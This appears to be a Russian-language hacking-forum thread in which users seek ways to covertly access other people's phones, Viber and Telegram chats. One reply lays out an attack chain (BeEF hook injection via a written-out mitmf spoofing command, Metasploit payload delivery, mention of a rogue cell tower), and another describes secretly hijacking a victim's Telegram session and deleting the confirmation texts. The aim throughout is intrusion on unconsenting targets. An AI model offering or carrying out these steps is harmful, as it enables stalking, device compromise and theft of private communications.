HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.11.2019, 13:42
HASARD
Новичок
Регистрация: 27.02.2019
Сообщений: 7
С нами: 3795446

Репутация: 0
По умолчанию

Viber переписку возможно получить такими методами ?
 
Ответить с цитированием

  #12  
Старый 23.12.2019, 17:47
irainbow
Новичок
Регистрация: 20.12.2019
Сообщений: 10
С нами: 3369206

Репутация: 0
По умолчанию

Добрый день, прошу помощи новичку, если не трудно в данном вопросе. Также изучаю тему получения доступа к файловой системе Андроидов и в поиске по форуму наткнулся на здешнее сообщение, где предлагается использовать Метасплоит и получение по средствам MS шела на соответствующем телефоне, и возник вопрос, как можно установить пейлоад на целевое устройство, созданный msfvenom без вот такого явного участия собственника телефона (т.е. без явного привлечения методов социальной инженерии, или же как это сделать незаметно) в той же Wifi сети. Есть ли иной способ проникнуть на телефон?
 
Ответить с цитированием

  #13  
Старый 26.12.2019, 22:46
tester_new
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
С нами: 7499126

Репутация: 24
По умолчанию

1. Подними сервер beef

2. Подними с помощью msf какой то пассивный сплойт(под мобильные устройства), или можешь поднять несколько, и далее редиректить их с одного сервера(msf) на другой(если один не сработал то на другой итд)

3. Запусти mitmf.py -i wlan0--inject --spoof --js-url http://beef:3000/hook.js и жди...

4. Как только увидишь что подцепил браузер запускай кидай юзеру событие в браузер по клику на которое он будет перенаправлен на твои сервера msf.

ps: Надеюсь что сам ход мысли понятен, реализовать желаемое можно многими способами, в теории можно заглушить 3g/4g и на osmocom поднять свою BTS и переподключить все девайсы к ней, и далее уже с помощью соц. инженерии(и не только) пытаться реализовать задуманное.
 
Ответить с цитированием

  #14  
Старый 07.01.2020, 14:21
irainbow
Новичок
Регистрация: 20.12.2019
Сообщений: 10
С нами: 3369206

Репутация: 0
По умолчанию

Спасибо, а можете пояснить плез как сервера с msf развернуть, гуглил msf server, но похоже не корректно задаю вопрос. Или надо в лоб все делать т.е. для примера перенаправлять, когда юзер нажал на beef-событие из браузера, на мой апач сервис, где у меня грубо говоря написано для примера "Hello World, скачайте payload" со ссылкой на апк файл для скачивания?

Цитата:
Сообщение от tester_new  

2. Подними с помощью msf какой то пассивный сплойт(под мобильные устройства), или можешь поднять несколько, и далее редиректить их с одного сервера(msf) на другой(если один не сработал то на другой итд)
...
4. по клику на которое он будет перенаправлен на твои
сервера msf
.
Эти пункты очень интересуют
 
Ответить с цитированием

  #15  
Старый 15.01.2020, 17:45
jeanslend
Новичок
Регистрация: 14.09.2018
Сообщений: 23
С нами: 4034486

Репутация: 0
По умолчанию

Есть вообще вероятность прочитать переписку в чужом Telegram?
 
Ответить с цитированием

  #16  
Старый 16.01.2020, 16:16
tester_new
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
С нами: 7499126

Репутация: 24
По умолчанию

Цитата:
Сообщение от irainbow  

Спасибо, а можете пояснить плез как сервера с msf развернуть, гуглил msf server, но похоже не корректно задаю вопрос. Или надо в лоб все делать т.е. для примера перенаправлять, когда юзер нажал на beef-событие из браузера, на мой апач сервис, где у меня грубо говоря написано для примера "Hello World, скачайте payload" со ссылкой на апк файл для скачивания?
Эти пункты очень интересуют
Ответ на эти пункты должен включать полное объяснение как пользоваться данными инструментами. Наберите в гугле просто 'metasploit how to hack browser' и я вам даю гарантию в 99% что там будет информация.

юзер кликнул на красивое окошло которое у него всплыло, и автоматом отправился на ваш msf сервер, в результате чего в него был загружен и выполнен payload(какой уже решать вам) и вы получили на своей стороне сессию. Далее эту схему уже можно автоматизировать и улучшать....
 
Ответить с цитированием

  #17  
Старый 30.01.2020, 18:53
Saruman023
Новичок
Регистрация: 15.01.2020
Сообщений: 1
С нами: 3331766

Репутация: 0
По умолчанию

Цитата:
Сообщение от jeanslend  

Есть вообще вероятность прочитать переписку в чужом Telegram?
я делал так, отвлекал жертву чтоб она была занята далеко от телефона, с ее номера заходил в веб версию телеги, подтверждал вход с ее телефона, смс с подтвержденями удалял, вуаля - есть доступ
 
Ответить с цитированием

  #18  
Старый 01.02.2020, 14:31
DM_i
Новичок
Регистрация: 17.01.2020
Сообщений: 8
С нами: 3328886

Репутация: 0
По умолчанию

Без доступа к гаджету это ничего не получится
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.